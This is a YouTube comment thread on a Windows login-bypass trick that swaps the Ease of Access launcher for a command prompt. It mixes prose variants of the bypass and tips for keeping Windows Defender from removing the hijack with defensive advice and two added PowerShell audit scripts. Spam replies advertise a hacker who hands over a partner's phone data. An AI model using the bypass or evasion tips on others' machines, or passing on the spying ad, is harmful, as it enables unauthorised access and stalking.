      You can create a new admin account, go to Explorer, navigate to the Users folder, click on the user with the Microsoft account and you can still see all the files of that user, edit them, copy them over, delete them, ...

  • @evilgeniusxp
    @evilgeniusxp 6 months ago

    Did this today on a new install with all updates on Win 10. Worked perfectly

  • @happinesscompilation5252
    @happinesscompilation5252 1 year ago +9

    This is a very old/basic method of bypassing the login screen. Most admins will disable the ease of access option from the beginning.

    • @Jjarret
      @Jjarret 1 year ago

      Lol

    • @Jee2024IIT
      @Jee2024IIT 1 year ago

      Then can we program it on any other option?

    • @SOTP.
      @SOTP. 1 year ago

      @@Jee2024IIT yes, even the login screen itself, which of course won't be disabled (else it bricks the system)

    • @SOTP.
      @SOTP. 1 year ago

      I actually never saw anyone disable it. Even if they do, there's tons of programs you can use to do the same.

  • @RIOTNOOB
    @RIOTNOOB 1 year ago +1

    Thank you, my father-in-law passed away and my mother-in-law needed access to his PC.

  • @Effectivebasketball
    @Effectivebasketball 1 year ago +2

    You did everything right, although even a beginner hacker would not do that. Everything you explained is a nice way for users to get back into their system, and it has nothing to do with hacking.

  • @EZLogikal
    @EZLogikal 1 year ago

    I will have to remember this the next time I accidentally lock myself out of my own box. For me, it's better to leave no trace... this will definitely alert the user they have been pwned. Super useful, though!

  • @toweliethetowel8280
    @toweliethetowel8280 1 year ago +9

    7:03 That laugh was pure evil. Better like this video for not being hacked.

    • @nizu9544
      @nizu9544 1 year ago +1

      I use BlackArch Linux btw

  • @ljsystems5694
    @ljsystems5694 1 year ago +7

    To stop this kind of attack in the first place, you can set up a BIOS password. Just make sure you cannot boot from another drive / USB stick without typing the BIOS password first.

    • @timmytainment
      @timmytainment 1 year ago +1

      You should bypass even that by resetting your BIOS on the hardware level

    • @SOTP.
      @SOTP. 1 year ago

      Sometimes people leave out the boot menu / accidentally leave the CD, floppy disk or other as the priority, and so you can boot from it. If all that doesn't work, you can only reset the BIOS or take out the hard drive so it boots from USB, then reconnect the hard drive (if it even gets recognized)

  • @m3ow21
    @m3ow21 1 year ago

    I've done this once when I accidentally locked my father's laptop. I was so thrilled when it worked and it saved my life as well😅.

  • @Gunmetalsunglasses
    @Gunmetalsunglasses 1 year ago +7

    That was done with ease of access on Win7 years ago. A little different but same concept

    • @dillonbabb7156
      @dillonbabb7156 1 year ago +1

      I'm really surprised that they still haven't done anything about this. I would suggest a hash verification function of the called program before letting any of these buttons continue the call. Should add very little time.

    • @EvilSapphireR
      @EvilSapphireR 1 year ago

      @@dillonbabb7156 that would mean Microsoft would never be able to reliably patch utilman.exe in case there's any vulnerability.

    • @Jee2024IIT
      @Jee2024IIT 1 year ago

      Can I ask one question?
      What if we directly write the password changing command on cmd at that reboot step only?

    • @samfkt
      @samfkt 1 year ago

      It's exactly the same... same as in this video or another method with "startup repair"... and it's working since Win 95/98.

  • @Roberto-fz4jm
    @Roberto-fz4jm 1 year ago

    This is the first video I've seen and it got me subscribed.

  • @edgarfernandez8998
    @edgarfernandez8998 1 year ago +9

    I believe you could have changed the password from the CMD prompt while you were booted on the usb key. So this way the Windows exe file stays unmodified... No?

    • @firsttimegaming3557
      @firsttimegaming3557 1 year ago +5

      No, then it would have changed on the Windows installation media, not the actual OS

    • @muskafella
      @muskafella 1 year ago

      No. Fail bro fail

  • @ItsOnlyLogixal
    @ItsOnlyLogixal 1 year ago

    Known this for many years. Nice to know I knew something the great hacker Loi didn't!

  • @rogermouton2273
    @rogermouton2273 1 year ago +23

    It's always felt like a security risk to me to allow anything to be done without logging in. Turns out I was right. Seems to me that, especially after all these years, MS are completely negligent for not fixing this.

    • @thesoulsender
      @thesoulsender 1 year ago +4

      definitely a reason to encrypt your drive

    • @vedranb87
      @vedranb87 1 year ago

      @@thesoulsender how does encryption prevent this exploit? I thought that once you're at the login screen the encryption is already bypassed on a hardware level. I changed a motherboard recently and I couldn't boot until I dug out my BitLocker key, but past that, the hard drive is accessible with installation media.
      I was even able to use the registry to enable a local offline login with a password because the network driver wasn't working, so I couldn't log in with the PIN and it wanted to authenticate online only, which obviously wasn't working without the network driver.

    • @thesoulsender
      @thesoulsender 1 year ago +3

      @@vedranb87 when you boot into a live environment like the installer, the drive the actual system is on isn’t mounted and decrypted yet, so you can’t access anything on it. If you don’t believe me, try it yourself with bitlocker on and a windows or even a linux live environment

    • @flyhigh6047
      @flyhigh6047 1 year ago

      @@vedranb87 a bit late, but an unencrypted drive is essentially usable by other devices, try plugging your boot drive into another machine as a non-boot drive and the data will be readable and writable.

    • @JesseFleming1990
      @JesseFleming1990 1 year ago +1

      Not sure that's accurate. MS utilizes UEFI and Bitlocker encryption. Technically if you have access to an unencrypted disk you could do anything and that's on whomever installed your OS without Bitlocker.

  • @daanmageddon
    @daanmageddon 11 months ago +1

    Won't work on a properly secured system with storage encryption like BitLocker. Also, when rebooting there is no guarantee the BIOS is set to boot from removable media. However, you can try to hold Shift when clicking Restart; modern Windows systems will show a dialogue that could allow you to boot from removable media on next boot (but again, if properly secured by GPOs, that should not be allowed). By the way, hacking the local SAM db is as old as Windows XP, so instead of messing up your Windows installation you could just take that time to create an ntpassword reset USB stick; still, the same caveats apply. This isn't as exciting and revolutionary as you portray it to be imho.

  • @greeneyes-_-
    @greeneyes-_- 1 year ago +3

    If only I knew this 3 months ago when drunk me changed the password then forgot it next morning.

  • @Lardzor
    @Lardzor 1 year ago +1

    Hiren's Boot CD is free software that has a utility to reset Windows 10 passwords. You just boot from CD / USB, which uses a slimmed-down version of Linux. Since Linux does not respect Microsoft file permissions, it can access Windows user account files. Then run the password utility, choose the user account and change the password. It seems simpler than the method in this video.

  • @unmountablecyiber4416
    @unmountablecyiber4416 1 year ago +8

    Only works on local accounts, not on connected Microsoft accounts sadly

    • @RassieKariuki
      @RassieKariuki 1 year ago

      Yeah, then you can use the local admin to change permissions of other user folders.

    • @rebel__rana
      @rebel__rana 1 year ago

      @@RassieKariuki IF there is any local account. When you connect to an MS account, isn't the local account removed or deleted?

    • @geroffmilan3328
      @geroffmilan3328 1 year ago

      @@rebel__rana correct.
      And by default in Win10 onwards the process defaults to asking you for a Microsoft/AzureAD account.

  • @luismarrero9293
    @luismarrero9293 1 year ago +1

    Thanks Liang, this is an old way to access Windows but still good even on Windows 11. Thanks for all the content, videos, etc., always super interesting. By the way, if you don't have a bootable Windows installation, WinPE will work too. Anything that allows you to access cmd is OK.

  • @pandox_2420
    @pandox_2420 1 year ago +5

    These hijacks will be detected as Win32/AccessibilityEscalation and will cause Windows Defender to automatically remove the offending debugger from the Registry key.

    • @Exprotionen
      @Exprotionen 1 year ago

      Is there a way to make this not happen?

    • @pandox_2420
      @pandox_2420 1 year ago

      @@Exprotionen yeah, I would think you could disable Windows Defender

    • @david808323
      @david808323 1 year ago

      @@Exprotionen yes, change the security on the file to block everyone, including System and TrustedInstaller.

    • @Compute_and_Hack
      @Compute_and_Hack 2 months ago

      In cmd is it possible?

    • @pandox_2420
      @pandox_2420 2 months ago

      @@Compute_and_Hack nope, Windows Defender will detect the Blackfoot in your registry
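
The thread above makes three defensive points: admins can neutralise the Ease of Access launcher, a hash or signature check on the launched program would catch a swapped binary, and Defender flags an accessibility "debugger" registered in the registry. The script below is an added example written for this page, not code from the video or from any commenter: it audits the accessibility helpers reachable from the logon screen for a replaced file (Authenticode signature plus the version resource's OriginalFilename) and for an Image File Execution Options `Debugger` value. The binary list and the IFEO key path are documented Windows locations; the OriginalFilename comparison is my own heuristic and is labelled as such in the code.

```powershell
# Added audit script (not from the video or any commenter). Checks the accessibility
# helpers Windows exposes on the logon screen for the two hijack forms this thread
# discusses: a replaced binary in System32 and an IFEO "Debugger" value.
# Run from an elevated PowerShell 5.1+ prompt. The binary list and the IFEO key are the
# documented Windows locations; the OriginalFilename comparison is a heuristic (assumption).

$AccessibilityBinaries = @(
    'utilman.exe', 'sethc.exe', 'osk.exe', 'narrator.exe',
    'magnify.exe', 'displayswitch.exe', 'atbroker.exe'
)
$IfeoRoot = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$System32 = Join-Path $env:SystemRoot 'System32'

function Test-AccessibilityBinary {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$Name)

    $path     = Join-Path $System32 $Name
    $findings = New-Object System.Collections.Generic.List[string]

    if (-not (Test-Path -LiteralPath $path)) {
        $findings.Add('file missing')
    } else {
        # Check 1: Authenticode. A hand-copied or patched file normally has no valid
        # Microsoft signature at all.
        $sig = Get-AuthenticodeSignature -FilePath $path
        if ($sig.Status -ne 'Valid') {
            $findings.Add("signature status: $($sig.Status)")
        } elseif ($sig.SignerCertificate.Subject -notmatch 'Microsoft') {
            $findings.Add("unexpected signer: $($sig.SignerCertificate.Subject)")
        }

        # Check 2 (heuristic): a renamed copy of cmd.exe is still validly Microsoft-signed,
        # but its version resource keeps cmd.exe's own OriginalFilename. Compare the file
        # name stem; -notlike is case-insensitive because the resource strings vary in case.
        $stem = [System.IO.Path]::GetFileNameWithoutExtension($Name)
        $orig = (Get-Item -LiteralPath $path).VersionInfo.OriginalFilename
        if ($orig -and $orig -notlike "$stem*") {
            $findings.Add("OriginalFilename is '$orig', expected '$stem.exe'")
        }
    }

    # Check 3: IFEO Debugger. Whatever is named here runs in place of the binary; this is
    # the "debugger in the registry key" the comment says Defender removes.
    $ifeoKey = Join-Path $IfeoRoot $Name
    if (Test-Path -LiteralPath $ifeoKey) {
        $dbg = (Get-ItemProperty -LiteralPath $ifeoKey -Name Debugger -ErrorAction SilentlyContinue).Debugger
        if ($dbg) { $findings.Add("IFEO Debugger set: $dbg") }
    }

    [pscustomobject]@{
        Binary   = $Name
        Status   = if ($findings.Count -eq 0) { 'OK' } else { 'SUSPECT' }
        Findings = $findings -join '; '
    }
}

$results = $AccessibilityBinaries | ForEach-Object { Test-AccessibilityBinary -Name $_ }
$results | Format-Table -AutoSize
# Non-zero exit so a scheduled task or RMM job can raise an alert on any SUSPECT row.
if ($results.Status -contains 'SUSPECT') { exit 1 }
```

Two caveats for anyone running this: on Windows builds where `Get-AuthenticodeSignature` does not resolve catalog signatures, the system binaries report `NotSigned` rather than `Valid`, so treat that status as inconclusive and compare the file against the OS catalog instead; and a clean result only covers the two hijack forms named in the thread, not the offline-boot tampering a missing BitLocker PIN or unlocked firmware still allows.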

  • @martinedel8448
    @martinedel8448 1 year ago

    For some reason I am happy that I have Linux at home and Windows in the office :D. Of course not all is safer in Linux, but quite a few things really are.

  • @TheNimaMohammadi
    @TheNimaMohammadi 1 year ago +8

    Excellent😍

  • @picsnmorede
    @picsnmorede 1 year ago

    Nice thought, but does it work on encrypted drives, too?
    And does STRG F10 also work at a later point in the installation process (i.e. if you have to load a controller driver first, as you have to on modern computers with NVMe drives)?

  • @katelona13
    @katelona13 10 months ago +6

    I dont know what I would have done without almods geniues help in my divorce case. Your dedication, enthusiasm, and expertise were like a lifesaver. youre my hero!

    • @daniellasanchez7521
      @daniellasanchez7521 10 months ago +3

      how did they do it, did you see live locations too

    • @katelona13
      @katelona13 10 months ago +1

      yes they gave me full phone datas

    • @daniellasanchez7521
      @daniellasanchez7521 10 months ago +3

      can i see the harka emall pls, i'll like to see my partner phones aswell

    • @katelona13
      @katelona13 10 months ago

      all genues

    • @katelona13
      @katelona13 10 months ago

      @ G m a l l.

  • @calebjones3905
    @calebjones3905 1 year ago

    I actually learned this on my own when playing around trying to download games on our school computers. Eventually was able to play CSGO and some other stuff lol.
    Good times!

  • @joeneighbor
    @joeneighbor 1 year ago +2

    Just boot from an Ubuntu live on a thumb drive and clear the password.

    • @Compute_and_Hack
      @Compute_and_Hack 2 months ago

      How... I have Kali live.
      How would you clear the passwd🙍

    • @joeneighbor
      @joeneighbor 2 months ago

      @@Compute_and_Hack I had to walk through a tutorial every time I've done it.
      Did it last time about a year ago, still worked fine with Windows 10 64-bit.

  • @OFFRoadWheels
    @OFFRoadWheels 1 year ago

    I did this on a Windows Server 2012 Enterprise back in the day, also to know that anybody with low-level access to help me file helps you find a lot

  • @DEATHIAM6
    @DEATHIAM6 1 year ago +5

    That is far more steps than necessary. Lol. Personally, I would just boot into safe mode cmd prompt w/ networking. From there, use the net user command and simply change the psw via DOS commands

    • @13aker0
      @13aker0 1 year ago

      Should work on machines with BitLocker OFF... and sadly most recent laptops have it enabled by default, and users are encouraged to do so if not yet done.

    • @SOTP.
      @SOTP. 1 year ago

      that doesn't allow you to access the admin account...

  • @luisderivas6005
    @luisderivas6005 1 year ago +1

    Similar approaches exist for Linux (pick your flavor), OSX, CAN-BUS, etc. If you want to make it hard, encrypt your volumes...the reason for the big TPM push. But if I have physical access to the device, that is already half the battle.

    • @swimfan6292
      @swimfan6292 1 year ago

      CAN bus and OSX don't belong in the same sentence lol. It's like comparing USB and ChromeOS... They don't use CAN bus on personal computers. But you can use a Bluetooth ELM327 chip to interface over the serial bus with your OBD2 logger if it's the right kind

  • @mrcheeks7335
    @mrcheeks7335 1 year ago +3

    You told us the trick... but you should also tell how to prevent this.
    A. BitLocker, only available on Windows Pro (so the drive cannot be removed and read in another computer)
    B. A BIOS password that prevents anyone from even getting into the Windows login screen in the first place.
    Please upvote so everyone knows how to defend against this. =D

    • @RobbieHatley
      @RobbieHatley 1 year ago

      I'm not familiar with BitLocker; I'd have to look that up. I don't use any kind of Windoze (currently all my computers are running Manjaro Plasma instead). But I wonder if a Linux-compatible technology exists to prevent a drive transplant from working? (LUKS is nice, but only works on data drives and only works if you install it when formatting the drive before writing data.)
      BIOS passwords on most computers can be reset in 30 seconds by popping off the left-side cover, moving the "clear CMOS" jumper to "clear" then back to "run", then putting the left-side cover back on; voila, no more BIOS password.
      Windows passwords are a joke if an attacker is able to get their hands physically on your computer. They can just boot from a Nordahl USB, set all the passwords to empty, remove the USB stick, press reset, and voila, all Windows passwords are blank.

    • @david808323
      @david808323 1 year ago

      What makes you think Bitlocker can't be cracked? It can, and is done.

  • @ConveyApp
    @ConveyApp 1 year ago

    Back in the day, probably early Windows XP, bypassing the Windows login was super easy. I would press F8 into safe mode. Then from safe mode you could remove the password from all users. Then reboot. No more password.

  • @incremental_failure
    @incremental_failure 1 year ago +6

    This is like 20 years old. But you don't need any Windows installation as long as you can access the NTFS filesystem.

    • @HyperVectra
      @HyperVectra 1 year ago

      Thanks for that, I'll switch to FAT32 right away

    • @incremental_failure
      @incremental_failure 1 year ago

      @@HyperVectra Fine, *any* unencrypted filesystem. Does Win10/11 even work with FAT32?

  • @natekelly4174
    @natekelly4174 1 year ago

    Can you also use the command prompt from advanced troubleshooting options? I work remotely and sometimes clients don’t have access to removable media.

  • @infinitybrutal
    @infinitybrutal 1 year ago +10

    That's What We Need

  • @AndyHerbert254
    @AndyHerbert254 1 year ago

    FYI, BitLocker (or any) encryption with secure boot (secure boot optional) makes this hack entirely obsolete. Even if you only use the rather insecure TPM, you'll need the full recovery key to access the files from the USB or any OS that is not the installed Windows OS itself (unless you have admin access before restarting, which means you can pause encryption, but at that point why go through all these steps to log in again?).
    It could be possible with only the TPM to inject some code into the Windows boot process from a USB device which would override utilman, so I recommend also setting a BitLocker PIN/password (also VeraCrypt, support TPM+password please, TPM isn't always "redundant"). And make sure to have an admin password set in the BIOS to make sure the boot order can't be reordered (though the BIOS can sometimes be easily reset without the password, but then this would trigger secure boot failing, forcing a BitLocker recovery code)
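
The two comments above (mrcheeks7335's prevention list and AndyHerbert254's note on TPM-only versus TPM+PIN) name the controls that actually stop an offline boot from touching System32. The script below is an added example for this page, not code from the video or from either commenter: it reports whether those controls are present on the machine it runs on, using the built-in `Get-BitLockerVolume`, `Confirm-SecureBootUEFI` and `Get-Tpm` cmdlets. The firmware admin password is deliberately not checked, because it is not visible from inside Windows.

```powershell
# Added posture check (not from the video or any commenter). Reports whether the controls
# this thread names as the real defence against offline tampering are in place:
# BitLocker on the OS volume, a pre-boot secret on top of the TPM, and Secure Boot.
# Run elevated. The BitLocker cmdlets exist on Pro/Enterprise/Education editions; the
# BIOS/UEFI admin password recommended above cannot be queried from inside Windows.

function Get-OfflineTamperPosture {
    $report = [ordered]@{}

    # 1. BitLocker on the system drive. Without it, any boot medium can read and modify
    #    System32, which is exactly what the utilman swap relies on.
    $vol = $null
    if (Get-Command Get-BitLockerVolume -ErrorAction SilentlyContinue) {
        $vol = Get-BitLockerVolume -MountPoint $env:SystemDrive -ErrorAction SilentlyContinue
    }
    if ($null -eq $vol) {
        $report.BitLocker     = 'cmdlet unavailable (Home edition?) or query failed'
        $report.KeyProtectors = 'n/a'
        $report.PreBootAuth   = 'NO'
    } else {
        $report.BitLocker     = "$($vol.ProtectionStatus) ($($vol.VolumeStatus), $($vol.EncryptionPercentage)%)"
        $types = @($vol.KeyProtector | ForEach-Object { [string]$_.KeyProtectorType })
        $report.KeyProtectors = if ($types) { $types -join ', ' } else { 'none' }
        # TPM-only unlocks the disk unattended up to the logon screen, so an offline attack
        # only has to get past the firmware boot order. TpmPin, TpmPinStartupKey or a plain
        # Password protector demands a secret before the OS volume is unlocked.
        $preboot = $types | Where-Object { $_ -in @('TpmPin', 'TpmPinStartupKey', 'Password') }
        $report.PreBootAuth   = if ($vol.ProtectionStatus -eq 'On' -and $preboot) { 'YES' } else { 'NO (TPM-only or protection off)' }
    }

    # 2. Secure Boot. Confirm-SecureBootUEFI returns $true/$false on UEFI firmware and
    #    throws on legacy BIOS, which is itself worth reporting.
    try   { $report.SecureBoot = Confirm-SecureBootUEFI }
    catch { $report.SecureBoot = 'not UEFI or not supported' }

    # 3. TPM presence and readiness, which the protectors above depend on.
    $tpm = Get-Tpm -ErrorAction SilentlyContinue
    $report.TpmReady = if ($tpm) { $tpm.TpmReady } else { 'unknown' }

    [pscustomobject]$report
}

Get-OfflineTamperPosture | Format-List
```

Read the output the way the thread frames it: `BitLocker = Off` means the drive is open to any boot medium; `PreBootAuth = NO` with a `Tpm` protector means the volume will still be unlocked by the time the logon screen appears, which is the case AndyHerbert254 warns about; and a `SecureBoot` of `$false` or "not UEFI" means a reset firmware would not even trigger the recovery prompt he describes.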

  • @arjan-nuts-gaming
    @arjan-nuts-gaming 1 year ago +8

    Lol... This is NOT hacking... It's just using a feature. Using it often when a client forgets his password. This is also a reason why you encrypt your SSD/HDD... It will not work :)

  • @tye595
    @tye595 1 year ago +1

    i remember doing this but with the sticky key function .... doesn't matter where you are just spam on shift and you have cmd

  • @aribpm
    @aribpm 1 year ago +6

    Who uses a computer anymore?

  • @oneandonly3560
    @oneandonly3560 1 year ago

    Choice, Clever, Parsimonious...you are an Oracle my friend, an Oracle indeed. AYE!

  • @Dr.Cosmar
    @Dr.Cosmar 1 year ago

    Do you need the flashdrive though?
    Won't recovery mode have a command prompt?
    (Hold shift while selecting power > restart)

  • @brightdorian2890
    @brightdorian2890 1 year ago +1

    Many think this is a bug or security vulnerability but I don't think so, I think this is just a backdoor to help users reset their own passwords. Kali Linux also has a similar backdoor like this; with that, you don't even need a USB.
    The only time this becomes a vulnerability is when you have important documents on your PC and someone needs those documents and steals the PC. Even these days people normally save their documents in the cloud

  • @Ifalvarado
    @Ifalvarado 1 year ago +2

    For a moment I thought this was to give you the actual password, not change it; there are tons of tools for that for the SAM file. Still a nice find

  • @truepatriot2797
    @truepatriot2797 1 year ago +1

    So just to clarify to create the installation media would be done on a different computer correct?

  • @foonlam7134
    @foonlam7134 1 year ago +2

    Does this work if your computer is running off the company's network?

  • @uvgrv
    @uvgrv 1 year ago +1

    While this did exist since the days of Windows 7, a lot of you are forgetting one thing.
    The ability to access your main drive from the built-in recovery mode has been revoked in Windows 10. It's true that you can access your main drive using some recovery mode loophole in Windows 7, but in Windows 10 you would in fact need an installation drive so that you'd be able to access it.
    Spoken as a true IT guy who unfortunately had to deal with a lot of dumb people in the workplace who managed to forget their password to local accounts :D

  • @TrevorYogi
    @TrevorYogi 1 year ago

    This is nice and useful. I've been using this trick since 2013 as far as I remember...

  • @SteveSiegelin
    @SteveSiegelin 1 year ago

    I've used YouTube to bypass every Windows security screen since 2012. Back when I was younger I had all the OEM hotkeys and a plethora of software. Never needed any software to bypass the Windows screen except for maybe a recovery disk. I made this comment before I even watched your video, but it's to highlight that yes, it's always been very easy to get around if you are smart enough to find the research, but I've never been that guy to figure it out myself😅

    • @SteveSiegelin
      @SteveSiegelin 1 year ago

      This is the trick I learned! To this day I still haven't had a chance to attempt a Windows 11 machine but I've never been beaten by Windows yet 😂

    • @SteveSiegelin
      @SteveSiegelin 1 year ago

      PS the CMD feature can be your best friend if you learn how to use it properly

  • @alexstone3349
    @alexstone3349 1 year ago

    “V” for Vendetta is one of my favorite movies. Thanks

  • @aaronjackson7942
    @aaronjackson7942 1 year ago

    Quick question! How would I undo the Ease of Access cmd prompt window at the login screen? I used this to get into an old laptop my friend lost their password for and wanted to stop access to that now